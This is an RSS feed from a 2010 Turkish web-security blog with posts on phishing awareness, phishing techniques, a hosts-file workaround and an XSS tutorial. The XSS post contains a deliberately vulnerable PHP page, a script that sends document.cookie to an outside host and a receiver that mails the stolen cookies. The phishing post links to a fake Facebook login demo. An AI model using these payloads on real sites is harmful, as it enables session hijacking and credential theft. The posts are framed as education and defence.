<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>KnbykL Official Web Site &#124; Web Security, Web Application Security</title>
	<atom:link href="http://www.knbykl.org/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.knbykl.org</link>
	<description>Web Security, Articles and Application, Hacking Methods, SQL Injection, CSRF, XSRF and Server Security</description>
	<lastBuildDate>Wed, 23 Jun 2010 23:43:48 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Phishing Teknikleri</title>
		<link>http://www.knbykl.org/phishing-teknikleri/</link>
		<comments>http://www.knbykl.org/phishing-teknikleri/#comments</comments>
		<pubDate>Sun, 20 Jun 2010 22:36:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Advisories]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Güvenlik]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Pharming]]></category>

		<guid isPermaLink="false">http://www.knbykl.org/?p=651</guid>
		<description><![CDATA[Phishing teknikleri Sosyal Mühendislik gerektiren bir iş olarak görülür ve  tamamen sahtecilik, dolandırıclıktan kaynaklanır.Saldırgan; şifrelerinizi, kredi kartı bilgilerinizi veya kullanıcı adınızı öğrenmek için saldırı girişiminde bulunur. Bu okuyacağınız makale ise bu tür saldırılardan korunmanız için yazıldı. Phishing en çok mail ve anlık mesajlaşmayla hedefe ulaşır. Bu yüzden özellikle maillerinizdeki bağlantıları kontrol etmeden açmayın. Ayrıca az [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignnone size-full wp-image-654" title="phishing_teknikleri" src="http://www.knbykl.org/wp-content/uploads/2010/06/phishing_teknikleri.jpg" alt="" width="615" height="100" /><br />
Phishing teknikleri Sosyal Mühendislik gerektiren bir iş olarak görülür ve  tamamen sahtecilik, dolandırıclıktan kaynaklanır.Saldırgan; şifrelerinizi, kredi kartı bilgilerinizi veya kullanıcı adınızı öğrenmek için saldırı girişiminde bulunur. Bu okuyacağınız makale ise bu tür saldırılardan korunmanız için yazıldı.<span id="more-651"></span></p>
<p>Phishing en çok mail ve anlık mesajlaşmayla hedefe ulaşır. Bu yüzden özellikle maillerinizdeki bağlantıları kontrol etmeden açmayın. Ayrıca az da olsa telefonla da saldırı yapılabilir. Bir bankanın müşteri temsilcisi olarak sizi arayabilirler, bilgilerinizi sorabilirler. Bunu da anlamanın en iyi yolu sizi arayan temsilcinin hangi numaradan aradığıdır. Eğer bankanızın telefon numarası 444 0 444 ise ve bu numaradan bir çağrı geliyorsa güvenli bi şekilde bilgilerinizi verebilirsiniz. Ama bunun yerine sizinle 0216 *** ** **&#8217;lı bir numarayla, başka bir şehrin telefon koduyla veya cep telefonu numarasıyla ulaşmak isterlerse güvenmemenizi tavsiye ederim. Çünkü genelde gerçeği yansıtmayan kişiler tarafından kullanılır bu tür numaralar. Böyle numaralardan gelen aramalarda müşteri temsilcisi hangi bankadaysa, onun 444&#8242;lü numaradan veya sizin bildiğiniz banka numarasından sizi aramasını isteyebilirsiniz. Yine de bildiğim kadarıyla çoğu banka İstanbul alan koduyla müşterilerine ulaşıyor. Bu da bu tehlikeyi açıkca banka müşterilerine sunuyor.</p>
<p>Phishing ilk olarak 2 Ocak 1996&#8242;da Amerika&#8217;da ortaya çıkmıştır. Ayrıca; Phishing yüzünden ABD&#8217;de Mayıs 2004 ila Mayıs 2005 arasında 1.2 milyon bilgisayar kullanıcısı zarara uğramış ve toplam 929 Milyon Dolar kaybetmişlerdir, bu da şirketlere 2 milyar dolara yakın bir zarar teşkil etmiştir. İngiltere&#8217;de 2004&#8242;de 12.2 Milyon paund olan banka dolandırıcılığı, 2005&#8242;de 23.2 milyon paunda çıkmıştır.</p>
<h3>Phishing Saldırısında Kurbana Gönderilen Mail Örneği</h3>
<p>Bu genelde mail yoluyla saldırgan tarafından gizli link olarak yutturulmaya çalışılır. Fazla detaya girip kafanızı karıştırmak istemiyorum. Bir örnek herşeyi anlatır.</p>
<p><strong><span style="text-decoration: underline;">Bankadan gelen bir mail;</span></strong></p>
<p>Güvenlik Alarmı</p>
<p>Facebook hesabınızın hizmet süresi dolmak üzeredir.</p>
<p>Aşağıdaki linki kullanarak hesabınıza ulaşabilir ve hesabınızı tekrar aktif hale getirebilirsiniz.</p>
<p><a href="http://www.knbykl.org/Facebook.htm" target="_blank">https://www.facebook.com</a></p>
<p>© 2010 Facebook INC. &#8211; Her hakkı saklıdır.</p>
<p>Anlatmak istediğimi yukarıdaki facebook bağlantısına tıkladığınızda göreceksiniz. Çünkü bağlantı facebook anasayfası olarak gözüküyor ama aslında girdiğinizde sahte bir facebook sayfası göreceksiniz. Girdiğiniz bağlantıya kesinlikle gerçek facebook giriş bilgilerinizi yazmayın. Email kısmına aklınızdan gerçek olmayan bir mail adresi ve şifre alanına da bir şifre sallayın. Giriş&#8217;e tıklayın.</p>
<p>Sizi facebook.com anasayfasına yönlendirdi. Ama arkaplanda ne mi yaptı?</p>
<p><a href="http://www.knbyk.org/facebooksecurity.txt" target="_blank">Buraya tıklayarak sonuca bakabilirsiniz.</a></p>
<p>Açılan sayfanın en sonuna giderek girmiş olduğunuz emaili ve şifreyi göreceksiniz. Bu yüzden her gelen maile inanmayın.</p>
<p>Türkiye&#8217;de fazla kullanılmadığı için bu konuda fazla da güvenlik tedbiri yok. Bu yüzden Türkiye&#8217;de oltaya düşecek internet kullanıcısı çok fazla ve bunun için bir önlem de alınmamış durumda.</p>
<p>Dünyada yaygın olarak saldırı alan şirketler:</p>
<ol>
<li>JPMorgan Chase and Co.     -&gt; 13.390</li>
<li>PayPal     -&gt;     8.531</li>
<li>eBay Inc.     -&gt;     420</li>
<li>Bank of America Co.     -&gt;     360</li>
<li>Google     -&gt;     206</li>
</ol>
<p>Türkiye&#8217;den en çok saldırı alan şirketler:</p>
<ol>
<li>Garanti Bankası</li>
<li>ING Bank</li>
<li>Hepsiburada</li>
<li>PayPal</li>
<li>Hotmail</li>
<li>Gmail</li>
<li>Facebook</li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.knbykl.org/phishing-teknikleri/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Phishing Attack Techniques</title>
		<link>http://www.knbykl.org/phishing-attack-techniques/</link>
		<comments>http://www.knbykl.org/phishing-attack-techniques/#comments</comments>
		<pubDate>Sat, 19 Jun 2010 21:49:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Phishing]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Attack Methods]]></category>
		<category><![CDATA[Fake Website]]></category>
		<category><![CDATA[Hacker]]></category>
		<category><![CDATA[Phishing Attack Results]]></category>
		<category><![CDATA[Twitter]]></category>

		<guid isPermaLink="false">http://www.knbykl.org/?p=644</guid>
		<description><![CDATA[Phishing is one of the most common attack vectors used by hackers and social engineers to steal from victims, usually for financial gain but in today&#8217;s world, its also used to steal identities. In my previous article, Phishing and Identity Theft, I compared phishing to the actual art of fishing. In my other article, Phishing [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignnone size-full wp-image-645" title="Phishing_Attack_Techniques" src="http://www.knbykl.org/wp-content/uploads/2010/06/Phishing_Attack_Techniques.jpg" alt="" width="615" height="100" />Phishing is one of the most common attack vectors used by hackers and social engineers to steal from victims, usually for financial gain but in today&#8217;s world, its also used to steal identities.<span id="more-644"></span> In my previous article, Phishing and Identity Theft, I compared phishing to the actual art of fishing. In my other article, Phishing Versus Spoofing, I gave short examples of phishing and spoofing attacks. However, I&#8217;ve never explained the origins of phishing and the evolution to what it is now.</p>
<p>Phishing has been around since the earlier days of the internet, from the late 90&#8242;s, when America Online began their boom. The idea has not changed much since its inception, send out bait to fool victims into giving away their credentials. With the internet being new, many users were naive and a well worded fake e-mail would be enough to have a user give away their password. It wasn&#8217;t long before the news media caught on and warned users not to give away their credentials, no matter how official the e-mail looked. To go back to my fishing analogy, it was time for the fishermen to throw away their sticks with ropes and upgrade to fishing rods with spinning reels.</p>
<h3><span style="color: #00ccff;">Attack Methods &#8211; Websites</span></h3>
<p>The brief e-mails that addressed masses was no longer the most effective way to trick a victim into giving up their credentials. It was time for the hackers and social engineers to evolve their attack methods. To this day, these same attacks are currently being used for phishing.</p>
<h3><span style="color: #00ccff;">Fake Website</span></h3>
<p>A domain name similar to a legitimate site is bought, and molded to look exactly like the real thing. The phisher then sends out messages, either by e-mail, instant messaging, Facebook messages, text messages, and so forth to fool a victim into clicking a link to the fake site. The unsuspecting victim logs in and their credentials logged.</p>
<h3><span style="color: #00ccff;">Fake Pop-up</span></h3>
<p>An evolution of the &#8216;Fake Website&#8217; attack, when people became more aware of fake website attempts, the attack was evolved. A link was still sent, however, instead of linking to a fake website, it would link to the actual website. When the real website loads, a pop-up appears asking for the user&#8217;s credentials. The victim, seeing the legitimate site in the background would think the pop-up was from a legitimate source and enter their information. In reality, the pop-up would be the hacker&#8217;s tool to phish credentials.</p>
<h3><span style="color: #00ccff;">Fake Website with Validation</span></h3>
<p>Another evolution of the &#8216;Fake Website&#8217; attack was to have the fake website verify the victim&#8217;s credentials with the real site. A victim would enter their credentials, the fake website would send the credentials to the real website and automatically validate whether the username and password is correct or not; saving the hacker&#8217;s time by having autovalidation.</p>
<h3><span style="color: #00ccff;">Attack Methods &#8211; Social Networks</span></h3>
<p>Social networks have expanded the attack vectors for hackers and social engineers. Going back to the fisherman analogy, the fishermen have gone from fishing in lakes and ponds to oceans and rivers.</p>
<h3><span style="color: #00ccff;">Facebook</span></h3>
<p>Facebook is one of the most popular social networking sites to arise. They&#8217;ve expanded what users can do on Facebook. The allowance of applications, and a new internal messaging system have opened up the floodgates. A victim could be surfing on Facebook when they receive a message from someone, linking to a site, usually shortened down to something simple such as &#8216;Vote for me!&#8217; The victim clicks the link and lands on a login page that looks exactly like Facebook&#8217;s login page. The victim, thinking that this was a Facebook application for voting enters their credentials and gives away their username and password.</p>
<h3><span style="color: #00ccff;">The Friend Search</span></h3>
<p>Facebook and many other social networks offer a &#8216;Search for your friend&#8217; option. The idea behind the system is for the social network to search your messaging contacts and check if their e-mails are in the system. A hacker could use the &#8216;Fake Pop-up&#8217; method and have a &#8216;Find your friend on Facebook!&#8217; pop-up when a victim clicks a link to Facebook. The pop-up asks for the victim&#8217;s primary e-mail and password, and when the victim fills in the form, they&#8217;ve given away their e-mail account.</p>
<h3><span style="color: #00ccff;">Twitter</span></h3>
<p>A recent addition to the internet world. Recently, hackers used Twitter and tweeted links to a fake version of the Twitter site. They used methods to shorten the real URL. On their tweet, they would put a shortened link with a comment to have curious victims click the link. When the victim clicked the link a fake Twitter site loaded. The victim puts in their credentials and gives away their password.</p>
<h3><span style="color: #00ccff;">Phishing Attack Results</span></h3>
<p>Most people assume that the most damaging attacks are usually the attacks where a victim gives away their bank account or credit card information. By all means, if a phishing attack manages to capture bank account and credit card information, its definitely a success but to a phisher, even small victories count.</p>
<p>Trusteer, a security firm found that 73% of of users on the web use their bank password for everything. The chances that a social network site&#8217;s password and the victim&#8217;s bank account password are the same is tremendous. Bank accounts, credit accounts, social network accounts, insurance accounts, and whatever else a phisher can access can also lead to them gathering enough information to steal a victim&#8217;s identity!</p>
<p>Phishing attacks are constantly evolving but the core method is still the same. I&#8217;ll revert back to my fisherman analogy. Fishermen can use the most high tech equipment such as spinning reels, laser sights, motion detectors, sonar, or they could use the most simplest technologies such as rods with strings, but the end goal is the same, send out bait and earn back a catch. Phishing is the exact same idea, they can use the most advanced attacks such as fake websites, and fake pop-ups or they use the most simplest method such as e-mails, but the end goal is to send out bait and hook in victims. The big difference being the catch.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.knbykl.org/phishing-attack-techniques/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google Sayfalarına Giriş Sorunu ve Çözümü</title>
		<link>http://www.knbykl.org/google-sayfalarina-giris-sorunu-ve-cozumu/</link>
		<comments>http://www.knbykl.org/google-sayfalarina-giris-sorunu-ve-cozumu/#comments</comments>
		<pubDate>Sat, 05 Jun 2010 00:41:19 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Konu Dışı]]></category>
		<category><![CDATA[chrome.google.com]]></category>
		<category><![CDATA[docs.google.com]]></category>
		<category><![CDATA[Google Docs'a girmiyor]]></category>
		<category><![CDATA[Google Earth'a girmiyor.]]></category>
		<category><![CDATA[Google Groups'a girmiyor.]]></category>
		<category><![CDATA[Google Labs'a girmiyor.]]></category>
		<category><![CDATA[Google Services]]></category>
		<category><![CDATA[Google Servislerine Girmiyor]]></category>
		<category><![CDATA[Google Sorunu]]></category>
		<category><![CDATA[Google Translate Çalışmıyor]]></category>
		<category><![CDATA[Google translate sorunu]]></category>
		<category><![CDATA[groups.google.com]]></category>
		<category><![CDATA[labs.google.com]]></category>
		<category><![CDATA[sites.google.com]]></category>
		<category><![CDATA[translate.google.com]]></category>

		<guid isPermaLink="false">http://www.knbykl.org/?p=626</guid>
		<description><![CDATA[Türkiye&#8217;deki internet kullanıcılarının çoğu şu anda Google&#8217;ın çoğu sunduğu hizmete ulaşamıyor. Bunun nedeni ise Youtube&#8217;a dayanıyor. Google&#8217;ın; docs, translate, sport, map vs. hizmetlerine girmede sıkıntı yaşıyorsanız aşağıdaki anlatımı okuyabilirsiniz. Başlat &#62; Çalıştır Aşağıdaki dizin bilgisini sağ tıklayıp, kopyalayın ve &#8220;Çalıştır&#8221; hücresine yapıştırıp enterlayın. C:\Windows\system32\drivers\etc\hosts Karşınıza Birlikte Aç ekranı geldi, buradan Not Defteri&#8217;ni seçip, Tamam&#8217;a tıklayın. [...]]]></description>
			<content:encoded><![CDATA[<p>Türkiye&#8217;deki internet kullanıcılarının çoğu şu anda Google&#8217;ın çoğu sunduğu hizmete ulaşamıyor. Bunun nedeni ise Youtube&#8217;a dayanıyor. Google&#8217;ın; docs, translate, sport, map vs. hizmetlerine girmede sıkıntı yaşıyorsanız aşağıdaki anlatımı okuyabilirsiniz.</p>
<p><img class="alignnone size-full wp-image-629" title="google_servisleri" src="http://www.knbykl.org/wp-content/uploads/2010/06/google_servisleri.jpg" alt="" width="615" height="100" /></p>
<p><span id="more-626"></span></p>
<p>Başlat &gt; Çalıştır</p>
<p><img class="alignnone" src="http://www.knbykl.org/wp-content/uploads/2009/11/calistir.jpg" alt="" width="319" height="112" /></p>
<p>Aşağıdaki dizin bilgisini sağ tıklayıp, kopyalayın ve &#8220;Çalıştır&#8221; hücresine yapıştırıp enterlayın.</p>
<blockquote><p>C:\Windows\system32\drivers\etc\hosts</p></blockquote>
<p><img class="alignnone" src="http://www.knbykl.org/wp-content/uploads/2009/11/calistir-kodu.jpg" alt="" width="351" height="191" /></p>
<p>Karşınıza Birlikte Aç ekranı geldi, buradan Not Defteri&#8217;ni seçip, Tamam&#8217;a tıklayın.</p>
<p><img class="alignnone" src="http://www.knbykl.org/wp-content/uploads/2009/11/birlikte-ac.jpg" alt="" width="285" height="339" /></p>
<p>Açılan dosyanın en alt satırına aşağıdaki giriş kodlarını kopyalayıp, yapıştırın.</p>
<blockquote><p>74.125.43.103 docs.google.com<br />
74.125.43.103 translate.google.com<br />
74.125.43.103 code.google.com<br />
74.125.43.103 pages.google.com<br />
74.125.43.103 video.google.com<br />
74.125.43.103 translate.google.com.tr<br />
74.125.43.103 docs.google.com<br />
74.125.43.103 sites.google.com<br />
74.125.43.103 books.google.com<br />
74.125.43.103 chrome.google.com<br />
74.125.43.103 sketchup.google.com<br />
74.125.43.103 froogle.google.com<br />
74.125.43.103 labs.google.com<br />
74.125.43.103 mars.google.com<br />
74.125.43.103 moon.google.com<br />
74.125.43.103 notebook.google.com<br />
74.125.43.103 toolbar.google.com<br />
74.125.43.103 browsersync.google.com<br />
74.125.43.103 catalog.google.com<br />
74.125.43.103 codesearch.google.com<br />
74.125.43.103 dir.google.com<br />
74.125.43.103 earth.google.com<br />
74.125.43.103 groups.google.com.tr<br />
74.125.43.103 shopping.google.com<br />
74.125.43.103 sky.google.com<br />
74.125.43.103 support.google.com<br />
74.125.43.103 tools.google.com<br />
74.125.43.103 wap.google.com<br />
74.125.43.103 answers.google.com<br />
74.125.43.103 google-analystics.com</p></blockquote>
<p>Aşağıdaki resim gibi gözükmesi gerekiyor.</p>
<p><img class="alignnone size-full wp-image-628" title="hosts" src="http://www.knbykl.org/wp-content/uploads/2010/06/hosts.jpg" alt="" width="300" height="425" /></p>
<p>Kaydettikten sonra, rahatlıkla Google&#8217;ın servislerinden faydalanabilirsiniz.</p>
<h3><span style="color: #ff0000;">Bir anda bu sitelere girmeme nedeni</span></h3>
<p>Google yasaklandı şeklinde algılanan durum aslında bildiğimiz Youtube yasağından başka bir şey değildir. Youtube&#8217;un birçok farklı IP adresi kullanması ve ülkemizde mevcut olan yasağın DNS tabanlı engelleme olması nedeniyle mahkeme kararı tam anlamıyla uygulanamış sayılmıyordu. 31 Mayıs&#8217;ta aktif olan yeni uygulama ile erişim engelleme DNS tabanlı olmaktan çıkartılın IP bazlı olarak değiştirildi. TİB servis sağlayıcılara Youtube&#8217;un kullandığı kullandığı tüm ip adreslerinin bengellenmesi için yazı gönderdi ve böylece yasaklı sitelerin IP&#8217;leri tüm servis sağlayıcılar tarafından engellenmeye başlandı.</p>
<p>İşte sorun da tam bu noktada ortaya çıktı.<br />
Zahmet edip de kendi hizmetleri için ayrı IP atamayan Google, ortak bir IP havuzundan hem kendi hizmetlerine hem de Youtube&#8217;a IP atıyor, böylece Youtube&#8217;un yasaklanan IP&#8217;leri Google servislerine de ait olduğu için otomatik olarak onlar da yasak kapsamına giriyor. Özellikle de 74 ve 209 ile başlayan IP adresleri sorunun temel kaynağını oluşturuyor. Google servislerine ulaşmaya çalışan kullanıcıyı 74 ya da 209 ile başlayan IP&#8217;ye yönlendiriyor ama tesadüf(!) bu ya Youtube&#8217;da aynı rakamlarala başlayan IP&#8217;leri kullanıyor.</p>
<p>Kısacası Google hizmetlerine getirilmiş resmi bir yasak yok. Kurunun yanında yaş da yanar misali, tabi ihmalin de büyük katkısıyla YouTube&#8217;un yasaklı IP&#8217;lerinden nasiplenen analytics, earth, docs gibi Google hizmetleri ister istemez yasak kapsamına giriyor. Haber Kaynağı: HaberTürk</p>
]]></content:encoded>
			<wfw:commentRss>http://www.knbykl.org/google-sayfalarina-giris-sorunu-ve-cozumu/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Güvenli Internet</title>
		<link>http://www.knbykl.org/guvenli-internet/</link>
		<comments>http://www.knbykl.org/guvenli-internet/#comments</comments>
		<pubDate>Sun, 02 May 2010 01:51:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[HaberTürk]]></category>
		<category><![CDATA[Internet Güvenliği]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Security CD]]></category>

		<guid isPermaLink="false">http://www.knbykl.org/?p=613</guid>
		<description><![CDATA[Internet yaşama ve iş yapma tarzımızı değiştirdi. Her gün dünyanın dört bir yanında bir milyarın üzerinde insan çalışmak, alışveriş yapmak, oyun oynamak, bilgi edinmek, aile ve arkadaşlarıyla iletişim kurmak için interneti kullanıyor. Sizi bekleyen tehlikeler; İstenmeyen e-posta Rahatsız edici mesajlar Kimlik hırsızlığı Çocuk tacizi Internet sizi ve ailenizi istenmeyen e-posta, anlık mesaj gibi rahatsız edici [...]]]></description>
			<content:encoded><![CDATA[<p>Internet yaşama ve iş yapma tarzımızı değiştirdi. Her gün dünyanın dört bir yanında bir milyarın üzerinde insan çalışmak, alışveriş yapmak, oyun oynamak, bilgi edinmek, aile ve arkadaşlarıyla iletişim kurmak için interneti kullanıyor.</p>
<p><span style="color: #888888;"><strong>Sizi bekleyen tehlikeler</strong></span>;</p>
<ol>
<li><span style="color: #99cc00;"><strong>İstenmeyen e-posta</strong></span></li>
<li><span style="color: #99cc00;"><strong>Rahatsız edici mesajlar</strong></span></li>
<li><span style="color: #99cc00;"><strong>Kimlik hırsızlığı</strong></span></li>
<li><span style="color: #99cc00;"><strong>Çocuk tacizi</strong></span></li>
</ol>
<p><span id="more-613"></span></p>
<p>Internet sizi ve ailenizi istenmeyen <strong>e-posta</strong>, <strong>anlık mesaj gibi rahatsız edici durumlara</strong>, <strong>kimlik hırsızlığı</strong>, <strong>çocuk tacizi</strong> gibi risklere ve bilgisayarınıza zarar verecek veya değerli verilerinizi yok edecek güvenlik tehditlerine maruz bırakabilir. İnternetle birlikte gelen riskler korunmayı gerektirir. En iyi korunma yolu güvenli internet hakkında kapsamlı ve sürekli bir eğitim almaktır.</p>
<p><a href="http://www.guvenliinternet.net/guvenli/programlar" target="_blank"><img class="alignnone size-full wp-image-614" title="kurulum_video" src="http://www.knbykl.org/wp-content/uploads/2010/05/kurulum_video.jpg" alt="" width="615" height="100" /></a></p>
<p>Internet ortamında şiddet, pornografik içerik ve zararlı yayınlara karşı bilinçli olmak, tehlikeyi görmek, korunmayı bilmek, interneti yasaklamadan suç ve istismardan arındırabilmek çok önemlidir. Kendinizin, ailenizin, çocuğunuzun karşılaşabileceği riskleri bilmek ve bu riskleri nasıl azaltabileceğinizi ya da ortadan kaldırabileceğinizi öğrenmek çevrimiçinde daha güvende olmanızı sağlar.<br />
<a href="http://www.haberturk.com" target="_blank"><br />
</a> <a href="http://www.haberturk.com" target="_blank">HaberTürk</a> ve <a href="http://www.microsoft.com" target="_self">Microsoft</a> bu vesileyle internetin özgür ve güvenilir olması için ciddi bir girişim başlattı. İnternet nasıl özgür ve güvenilir kalır? En önemli sorumuz bu. <span style="color: #00ccff;"><em>Özellikle çocuklarımız kimlik hırsızlığı, uygunsuz görüntüler, taciz ve tehdit gibi belirli risklere karşı açık durumdalar. </em></span>Alabileceğiniz basit teknolojik yardımlar ya da çocuğunuzla bu konuda kuracağınız farklı bir ilişki, biraz daha dikkatli olmak, bilgisayarınızla ilgili alacağınız ufak tefek önlemler karşılaşabileceğiniz büyük sorunları ortadan kaldıracaktır. Bir problemle karşılaştığınızda nereye başvuracağınızı bilmek de önemli bir ayrıntıdır.</p>
<p>Özellikle ailelere tavsiye ediyorum, çocuğunuz için bunları bilmenizde fayda var.</p>
<p>kaynak: <a href="http://www.guvenliinternet.org" target="_blank">guvenliinternet.org</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.knbykl.org/guvenli-internet/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Cross Site Scripting Saldırısı ve Savunma Yöntemleri</title>
		<link>http://www.knbykl.org/cross-site-scripting-saldirisi-ve-savunma-yontemleri/</link>
		<comments>http://www.knbykl.org/cross-site-scripting-saldirisi-ve-savunma-yontemleri/#comments</comments>
		<pubDate>Sun, 04 Apr 2010 01:24:43 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Advisories]]></category>
		<category><![CDATA[XSS/CSRF/XSRF]]></category>
		<category><![CDATA[Cross Site Scripting]]></category>
		<category><![CDATA[Cross Site Scripting Attack]]></category>
		<category><![CDATA[Phishing XSS]]></category>
		<category><![CDATA[XSS]]></category>
		<category><![CDATA[XSS Korunma Yöntemleri]]></category>
		<category><![CDATA[XSS nedir?]]></category>
		<category><![CDATA[XSS Saldırı Teknikleri]]></category>

		<guid isPermaLink="false">http://www.knbykl.org/?p=545</guid>
		<description><![CDATA[Cross Site Scripting (XSS)&#8217;de Saldırı Yöntemlerini, kodlarla örnekleyerek, kaç farklı saldırı tipi olduğunu ve bu saldırılara karşı nasıl korunmanız gerektiğini, hangi fonksiyonlarla kodlamada XSS açığı bırakmayacağınızı anlatan bir döküman okuyacaksınız. Sorunlarınızı yorum yaparak belirtirseniz, yardımcı olurum. Kısaca: XSS Nedir? XSS Açığı Yaratma Cookie Hırsızlığı XSS Güvenliği Saldırı Yöntemleri Saldırıyı Filtreleme (Bypass) XSS Upload Phishing XSS [...]]]></description>
			<content:encoded><![CDATA[<p>Cross Site Scripting (XSS)&#8217;de Saldırı Yöntemlerini, kodlarla örnekleyerek, kaç farklı saldırı tipi olduğunu ve bu saldırılara karşı nasıl korunmanız gerektiğini, hangi fonksiyonlarla kodlamada XSS açığı bırakmayacağınızı anlatan bir döküman okuyacaksınız. Sorunlarınızı yorum yaparak belirtirseniz, yardımcı olurum.<br />
Kısaca:</p>
<ol>
<li><span style="color: #99cc00;"><strong><span style="color: #99cc00;"><a href="#xss_nedir"><span style="color: #99cc00;">XSS</span> Nedir?</a></span></strong></span></li>
<li><span style="color: #99cc00;"><strong><a href="#xss_acigi_yaratma"><span style="color: #99cc00;">XSS</span> Açığı Yaratma</a></strong></span></li>
<li><span style="color: #99cc00;"><strong><a href="#cookie"><span style="color: #99cc00;">Cookie</span> Hırsızlığı</a></strong></span></li>
<li><span style="color: #99cc00;"><strong><a href="#xss_guvenligi"><span style="color: #99cc00;">XSS</span> Güvenliği</a></strong></span></li>
<li><span style="color: #99cc00;"><strong><a href="#saldiri_yontemleri"><span style="color: #99cc00;">Saldırı</span> Yöntemleri</a></strong></span></li>
<li><span style="color: #99cc00;"><strong><a href="#bypass"><span style="color: #99cc00;">Saldırıyı</span> Filtreleme (Bypass)</a></strong></span></li>
<li><span style="color: #99cc00;"><strong><a href="#xss_upload"><span style="color: #99cc00;">XSS</span> Upload</a></strong></span></li>
<li><span style="color: #99cc00;"><strong><a href="#xss_phishing"><span style="color: #99cc00;">Phishing</span> XSS</a></strong></span></li>
</ol>
<p><span id="more-545"></span></p>
<h3><span style="color: #99cc00;"><span style="text-decoration: underline;"><a id="xss_nedir" name="xss_nedir">Bölüm #1| Xss Nedir?</a></span></span></h3>
<p>(Vikipedi, Özgür Ansiklopedi)</p>
<p><strong>Cross site scripting </strong>(XSS), bir bilgisayar güvenlik açığıdır. Saldırgan, HTML  kodlarının arasına istemci tabanlı kod gömmesiyle, kullanıcının tarayıcısında istediği istemci tabanlı kodu çalıştırabilir.</p>
<h3><span style="color: #99cc00;"><span style="text-decoration: underline;"><strong><a id="xss_acigi_yaratma" name="xss_acigi_yaratma">Bölüm #2 | XSS Açığı Yaratma</a></strong></span></span></h3>
<p>notepad.exe&#8217;yi çalıştırın ve aşağıdaki kodu index.html olarak kaydedin.</p>
<pre name="code" class="php">
< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<body>
<form action="XSS.php" method="post">
<p align="center"><strong>XSS Vulnerability by knbykl </strong>
<div align="center">
<table width="270" border="0">
<tr>
<td width="106"><strong>Ara:</strong></td>
<td width="154">
<input name="Vulnerability" type="text" id="Vulnerability" /></td>
</tr>
</table>
<table width="268" border="0">
<tr>
<td width="262">
<div align="center">
<input name="submit" type="submit" value="     Ara !     " />
      </div>
</td>
</tr>
</table></div>
</form>

</body>
</head></html>
</pre>
<p>Şimdi yeni bir notepad sayfası açın ve aşağıdaki kodları XSS.php olarak kaydedin.</p>
<pre name="code" class="php">
< ! DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< html xmlns="http://www.w3.org/1999/xhtml">
< head>
< meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
< title>Search result:
< /head>
< body>
<span class="alerte">Search result  :</span>&nbsp;<strong>< ?php echo $_POST['Vulnerability']; ?></strong>&nbsp;
< /body>
< /html>
</pre>
<p>Uyarı mesajı aldıysak, bu aşama tamamdır.</p>
<h3><span style="color: #99cc00;"><span style="text-decoration: underline;"><strong><a id="cookie" name="cookie">Bölüm #3 | Cookie Hırsızlığı</a></strong></span></span></h3>
<p>Örnek olarak ziyaretçi defterlerini hedef seçebilirsiniz. Aşağıdaki kodu kullanmamız gerekiyor.</p>
<pre name="code" class="php">
< script>
window. open("http://www.knbykl.org/cookie.php?cookies="+document.cookie);
< /script>
</pre>
<p>Notepad&#8217;de yeni bir sayfa açın ve cookie.php olarak kaydedin. Kayıt ettiğiniz belgeyi yukarıda belirtildiği gibi serverdaki dosyalarınızdaki doğru dizine yükleyin.</p>
<pre name="code" class="php">
< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< html xmlns="http://www.w3.org/1999/xhtml">
< head>
< meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
< title>Hata

< ? mail('email@example.com', 'Cookie stealed ! - thx knbykl :)', $cookies); ?>
< body>
<h2><strong>Hata</strong> - <strong>Access denied</strong> for < ? echo $_SERVER["REMOTE_ADDR"]; ?></h2>
</pre>
<h3><span style="color: #99cc00;"><span style="text-decoration: underline;"><strong><a id="xss_guvenligi" name="xss_guvenligi">Bölüm #4 | XSS Güvenliği</a></strong></span></span></h3>
